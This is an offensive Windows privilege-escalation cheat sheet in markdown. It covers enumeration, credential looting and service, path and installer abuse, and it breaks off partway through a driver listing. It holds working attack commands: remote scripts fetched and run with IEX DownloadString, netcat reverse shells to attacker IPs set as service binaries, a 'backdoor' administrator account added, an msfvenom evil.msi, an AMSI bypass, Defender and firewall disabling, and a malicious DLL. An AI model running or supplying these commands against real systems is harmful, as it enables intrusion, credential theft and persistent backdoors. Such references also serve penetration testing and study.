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# Windows - Privilege Escalation
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## Summary
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* [Tools](#tools)
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* [Windows Version and Configuration](#windows-version-and-configuration)
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* [User Enumeration](#user-enumeration)
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* [Network Enumeration](#network-enumeration)
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* [Antivirus & Detections](#antivirus--detections)
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* [Windows Defender](#windows-defender)
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* [AppLocker Enumeration](#applocker-enumeration)
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* [Powershell](#powershell)
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* [Default Writeable Folders](#default-writeable-folders)
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* [EoP - Looting for passwords](#eop---looting-for-passwords)
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* [SAM and SYSTEM files](#sam-and-system-files)
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* [Search for file contents](#search-for-file-contents)
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* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
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* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
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* [Passwords in unattend.xml](#passwords-in-unattendxml)
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* [Wifi passwords](#wifi-passwords)
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* [Sticky Notes passwords](#sticky-notes-passwords)
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* [Passwords stored in services](#passwords-stored-in-services)
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* [Powershell history](#powershell-history)
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* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
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* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
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* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
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* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
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* [EoP - Named Pipes](#eop---named-pipes)
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* [EoP - Kernel Exploitation](#eop---kernel-exploitation)
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* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
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* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
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* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
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* [EoP - Runas](#eop---runas)
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* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
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* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
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* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
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* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
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* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
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* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
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* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
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* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
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* [EoP - Privileged File Write](#eop---privileged-file-write)
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* [DiagHub](#diaghub)
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* [UsoDLLLoader](#usodllloader)
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* [WerTrigger](#wertrigger)
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* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
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* [MS08-067 (NetAPI)](#ms08-067-netapi)
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* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
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* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
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* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
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* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
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* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
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* [CVE-2019-1388](#cve-2019-1388)
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* [References](#references)
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## Tools
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- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
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```powershell
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powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
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```
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- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
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- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
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```powershell
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powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
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```
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- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
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- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
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```powershell
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./windows-exploit-suggester.py --update
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./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
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```
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- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
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- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
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- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
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- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
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```powershell
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Seatbelt.exe -group=all -full
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Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
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Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
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```
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- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
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- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
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```powershell
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powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
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```
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## Windows Version and Configuration
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```powershell
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systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
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```
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Extract patchs and updates
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```powershell
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wmic qfe
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```
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Architecture
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```powershell
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wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
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```
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List all env variables
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```powershell
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set
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Get-ChildItem Env: | ft Key,Value
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```
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List all drives
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```powershell
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wmic logicaldisk get caption || fsutil fsinfo drives
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wmic logicaldisk get caption,description,providername
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Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
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```
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## User Enumeration
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Get current username
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```powershell
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echo %USERNAME% || whoami
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$env:username
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```
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List user privilege
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```powershell
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whoami /priv
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whoami /groups
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```
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List all users
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```powershell
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net user
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whoami /all
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Get-LocalUser | ft Name,Enabled,LastLogon
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Get-ChildItem C:\Users -Force | select Name
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```
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List logon requirements; useable for bruteforcing
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```powershell$env:usernadsc
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net accounts
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```
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Get details about a user (i.e. administrator, admin, current user)
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```powershell
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net user administrator
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net user admin
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net user %USERNAME%
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```
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List all local groups
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```powershell
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net localgroup
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Get-LocalGroup | ft Name
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```
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Get details about a group (i.e. administrators)
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```powershell
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net localgroup administrators
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Get-LocalGroupMember Administrators | ft Name, PrincipalSource
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Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
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```
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## Network Enumeration
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List all network interfaces, IP, and DNS.
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```powershell
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ipconfig /all
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Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
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Get-DnsClientServerAddress -AddressFamily IPv4 | ft
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```
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List current routing table
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```powershell
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route print
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Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
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```
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List the ARP table
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```powershell
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arp -A
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Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
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```
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List all current connections
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```powershell
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netstat -ano
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```
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List firewall state and current configuration
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```powershell
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netsh advfirewall firewall dump
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or
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netsh firewall show state
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netsh firewall show config
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```
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List firewall's blocked ports
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```powershell
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$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
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```
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Disable firewall
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```powershell
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netsh firewall set opmode disable
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netsh advfirewall set allprofiles state off
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```
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List all network shares
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```powershell
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net share
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```
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SNMP Configuration
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```powershell
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reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
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Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
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```
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## Antivirus & Detections
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### Windows Defender
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```powershell
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# check status of Defender
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PS C:\> Get-MpComputerStatus
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# disable Real Time Monitoring
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PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
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```
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### AppLocker Enumeration
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- With the GPO
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- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
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List AppLocker rules
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```powershell
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PS C:\> $a = Get-ApplockerPolicy -effective
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PS C:\> $a.rulecollections
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```
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### Powershell
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Default powershell locations in a Windows system.
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```powershell
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C:\windows\syswow64\windowspowershell\v1.0\powershell
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C:\Windows\System32\WindowsPowerShell\v1.0\powershell
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```
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Example of AMSI Bypass.
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```powershell
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PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
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```
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### Default Writeable Folders
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```powershell
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C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
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C:\Windows\System32\spool\drivers\color
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C:\Windows\Tasks
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C:\windows\tracing
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```
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## EoP - Looting for passwords
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### SAM and SYSTEM files
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The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
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```powershell
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# Usually %SYSTEMROOT% = C:\Windows
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%SYSTEMROOT%\repair\SAM
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%SYSTEMROOT%\System32\config\RegBack\SAM
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%SYSTEMROOT%\System32\config\SAM
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%SYSTEMROOT%\repair\system
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%SYSTEMROOT%\System32\config\SYSTEM
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%SYSTEMROOT%\System32\config\RegBack\system
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```
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Generate a hash file for John using `pwdump` or `samdump2`.
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```powershell
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pwdump SYSTEM SAM > /root/sam.txt
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samdump2 SYSTEM SAM -o sam.txt
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```
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Then crack it with `john -format=NT /root/sam.txt`.
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### Search for file contents
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```powershell
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cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
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findstr /si password *.xml *.ini *.txt *.config
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findstr /spin "password" *.*
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```
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### Search for a file with a certain filename
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```powershell
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dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
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where /R C:\ user.txt
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where /R C:\ *.ini
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```
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### Search the registry for key names and passwords
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```powershell
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REG QUERY HKLM /F "password" /t REG_SZ /S /K
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REG QUERY HKCU /F "password" /t REG_SZ /S /K
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reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
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reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
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reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
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reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
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reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
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reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
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reg query HKLM /f password /t REG_SZ /s
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reg query HKCU /f password /t REG_SZ /s
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```
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### Read a value of a certain sub key
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```powershell
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REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
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```
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### Passwords in unattend.xml
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Location of the unattend.xml files.
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```powershell
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C:\unattend.xml
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C:\Windows\Panther\Unattend.xml
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C:\Windows\Panther\Unattend\Unattend.xml
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C:\Windows\system32\sysprep.inf
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C:\Windows\system32\sysprep\sysprep.xml
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```
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Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
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Example content
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```powershell
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<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
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<AutoLogon>
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<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
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<Enabled>true</Enabled>
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<Username>Administrateur</Username>
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</AutoLogon>
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<UserAccounts>
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<LocalAccounts>
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<LocalAccount wcm:action="add">
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<Password>*SENSITIVE*DATA*DELETED*</Password>
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<Group>administrators;users</Group>
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<Name>Administrateur</Name>
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</LocalAccount>
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</LocalAccounts>
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</UserAccounts>
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```
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Unattend credentials are stored in base64 and can be decoded manually with base64.
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```powershell
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$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
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SecretSecurePassword1234*
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```
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The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
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### IIS Web config
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```powershell
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Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
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```
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```powershell
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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
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C:\inetpub\wwwroot\web.config
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```
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### Other files
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```bat
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%SYSTEMDRIVE%\pagefile.sys
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%WINDIR%\debug\NetSetup.log
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%WINDIR%\repair\sam
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%WINDIR%\repair\system
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%WINDIR%\repair\software, %WINDIR%\repair\security
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%WINDIR%\iis6.log
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%WINDIR%\system32\config\AppEvent.Evt
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%WINDIR%\system32\config\SecEvent.Evt
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%WINDIR%\system32\config\default.sav
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%WINDIR%\system32\config\security.sav
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%WINDIR%\system32\config\software.sav
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%WINDIR%\system32\config\system.sav
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%WINDIR%\system32\CCM\logs\*.log
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%USERPROFILE%\ntuser.dat
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%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
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%WINDIR%\System32\drivers\etc\hosts
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dir c:*vnc.ini /s /b
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dir c:*ultravnc.ini /s /b
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```
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### Wifi passwords
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Find AP SSID
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```bat
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netsh wlan show profile
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```
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Get Cleartext Pass
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```bat
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netsh wlan show profile <SSID> key=clear
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```
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Oneliner method to extract wifi passwords from all the access point.
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```batch
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cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
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```
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### Sticky Notes passwords
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The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`
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### Passwords stored in services
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Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
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```powershell
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https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
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Import-Module path\to\SessionGopher.ps1;
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Invoke-SessionGopher -AllDomain -o
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Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
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```
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### Powershell history
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```powershell
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type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
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type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
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type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
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cat (Get-PSReadlineOption).HistorySavePath
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cat (Get-PSReadlineOption).HistorySavePath | sls passw
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```
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## EoP - Processes Enumeration and Tasks
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What processes are running?
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```powershell
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tasklist /v
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net start
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sc query
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Get-Service
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Get-Process
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Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||
```
|
||
|
||
Which processes are running as "system"
|
||
|
||
```powershell
|
||
tasklist /v /fi "username eq system"
|
||
```
|
||
|
||
Do you have powershell magic?
|
||
|
||
```powershell
|
||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||
```
|
||
|
||
List installed programs
|
||
|
||
```powershell
|
||
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||
```
|
||
|
||
List services
|
||
|
||
```powershell
|
||
net start
|
||
wmic service list brief
|
||
tasklist /SVC
|
||
```
|
||
|
||
Scheduled tasks
|
||
|
||
```powershell
|
||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||
```
|
||
|
||
Startup tasks
|
||
|
||
```powershell
|
||
wmic startup get caption,command
|
||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||
```
|
||
|
||
## EoP - Incorrect permissions in services
|
||
|
||
> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
|
||
|
||
Often, services are pointing to writeable locations:
|
||
- Orphaned installs, not installed anymore but still exist in startup
|
||
- DLL Hijacking
|
||
```powershell
|
||
# find missing DLL
|
||
- Find-PathDLLHijack PowerUp.ps1
|
||
- Process Monitor : check for "Name Not Found"
|
||
|
||
# compile a malicious dll
|
||
- For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
|
||
- For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
|
||
|
||
# content of windows_dll.c
|
||
#include <windows.h>
|
||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
|
||
if (dwReason == DLL_PROCESS_ATTACH) {
|
||
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
|
||
ExitProcess(0);
|
||
}
|
||
return TRUE;
|
||
}
|
||
```
|
||
|
||
- PATH directories with weak permissions
|
||
|
||
```powershell
|
||
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
||
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
||
|
||
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
||
FOR /F %i in (Servicenames.txt) DO echo %i
|
||
type Servicenames.txt
|
||
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
||
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
||
```
|
||
|
||
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
||
|
||
Note to check file permissions you can use `cacls` and `icacls`
|
||
> icacls (Windows Vista +)
|
||
> cacls (Windows XP)
|
||
|
||
You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output.
|
||
|
||
### Example with Windows 10 - CVE-2019-1322 UsoSvc
|
||
|
||
Prerequisite: Service account
|
||
|
||
```powershell
|
||
PS C:\Windows\system32> sc.exe stop UsoSvc
|
||
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||
PS C:\Windows\system32> sc.exe qc usosvc
|
||
[SC] QueryServiceConfig SUCCESS
|
||
|
||
SERVICE_NAME: usosvc
|
||
TYPE : 20 WIN32_SHARE_PROCESS
|
||
START_TYPE : 2 AUTO_START (DELAYED)
|
||
ERROR_CONTROL : 1 NORMAL
|
||
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
|
||
LOAD_ORDER_GROUP :
|
||
TAG : 0
|
||
DISPLAY_NAME : Update Orchestrator Service
|
||
DEPENDENCIES : rpcss
|
||
SERVICE_START_NAME : LocalSystem
|
||
|
||
PS C:\Windows\system32> sc.exe start UsoSvc
|
||
```
|
||
|
||
### Example with Windows XP SP1 - upnphost
|
||
|
||
```powershell
|
||
# NOTE: spaces are mandatory for this exploit to work !
|
||
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
|
||
sc config upnphost obj= ".\LocalSystem" password= ""
|
||
sc qc upnphost
|
||
sc config upnphost depend= ""
|
||
net start upnphost
|
||
```
|
||
|
||
If it fails because of a missing dependency, try the following commands.
|
||
|
||
```powershell
|
||
sc config SSDPSRV start=auto
|
||
net start SSDPSRV
|
||
net stop upnphost
|
||
net start upnphost
|
||
|
||
sc config upnphost depend=""
|
||
```
|
||
|
||
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe)
|
||
|
||
```powershell
|
||
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
|
||
RW SSDPSRV
|
||
SERVICE_ALL_ACCESS
|
||
RW upnphost
|
||
SERVICE_ALL_ACCESS
|
||
|
||
$ accesschk.exe -ucqv upnphost
|
||
upnphost
|
||
RW NT AUTHORITY\SYSTEM
|
||
SERVICE_ALL_ACCESS
|
||
RW BUILTIN\Administrators
|
||
SERVICE_ALL_ACCESS
|
||
RW NT AUTHORITY\Authenticated Users
|
||
SERVICE_ALL_ACCESS
|
||
RW BUILTIN\Power Users
|
||
SERVICE_ALL_ACCESS
|
||
|
||
$ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
|
||
$ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
|
||
$ sc stop <vuln-service>
|
||
$ sc start <vuln-service>
|
||
$ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
|
||
$ sc stop <vuln-service>
|
||
$ sc start <vuln-service>
|
||
```
|
||
|
||
## EoP - Windows Subsystem for Linux (WSL)
|
||
|
||
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
|
||
|
||
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
|
||
|
||
```powershell
|
||
wsl whoami
|
||
./ubuntun1604.exe config --default-user root
|
||
wsl whoami
|
||
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
||
```
|
||
|
||
Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
|
||
|
||
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
|
||
|
||
## EoP - Unquoted Service Paths
|
||
|
||
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
|
||
|
||
```powershell
|
||
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
|
||
|
||
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
|
||
|
||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||
```
|
||
|
||
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
||
* PowerUp exploit
|
||
|
||
```powershell
|
||
# find the vulnerable application
|
||
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
||
|
||
...
|
||
[*] Checking for unquoted service paths...
|
||
ServiceName : BBSvc
|
||
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
|
||
StartName : LocalSystem
|
||
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
|
||
...
|
||
|
||
# automatic exploit
|
||
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||
```
|
||
|
||
### Example
|
||
|
||
For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
|
||
- `C:\Program.exe`
|
||
- `C:\Program Files.exe`
|
||
|
||
## EoP - Named Pipes
|
||
|
||
1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
|
||
2. Check named pipes DACL: `pipesec.exe <named_pipe>`
|
||
3. Reverse engineering software
|
||
4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
|
||
|
||
|
||
## EoP - Kernel Exploitation
|
||
|
||
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
|
||
|
||
##### #Security Bulletin #KB #Description #Operating System
|
||
- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017) [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
|
||
- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
|
||
- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
|
||
- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
|
||
- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
|
||
- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010) [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
|
||
- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135) [KB3199135] [Windows Kernel Mode Drivers] (2016)
|
||
- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111) [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
|
||
- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) [KB3178466] [Kernel Driver] (Win 8.1)
|
||
- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
|
||
- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034) [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
|
||
- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032) [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
|
||
- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016) [KB3136041] [WebDAV] (2008/Vista/7)
|
||
- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014) [K3134228] [remote code execution] (2008/Vista/7)
|
||
...
|
||
- [MS03-026](./MS03-026) [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
|
||
|
||
To cross compile a program from Kali, use the following command.
|
||
|
||
```powershell
|
||
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
|
||
```
|
||
|
||
## EoP - AlwaysInstallElevated
|
||
|
||
Check if these registry values are set to "1".
|
||
|
||
```bat
|
||
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||
```
|
||
|
||
Then create an MSI package and install it.
|
||
|
||
```powershell
|
||
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
|
||
$ msiexec /quiet /qn /i C:\evil.msi
|
||
```
|
||
|
||
Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
|
||
|
||
## EoP - Insecure GUI apps
|
||
|
||
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
|
||
|
||
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
|
||
|
||
## EoP - Evaluating Vulnerable Drivers
|
||
Look for vuln drivers loaded, we often don't spend enough time looking at this:
|
||
|
||
```powershell
|
||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||
|
||
PS C:\Users\Swissky> driverquery.exe /fo table
|
||
Module Name Display Name Driver Type Link Date
|
||
============ ====================== ============= ======================
|
||
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
|
||
3ware 3ware Kernel 5/18/2015 6:28:03 PM
|
||
ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM
|
||
AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM
|
||
acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM
|
||
acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM
|
||
AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM
|
||
acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
|
||
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
|
||
<SNIP>
|
||
|
||
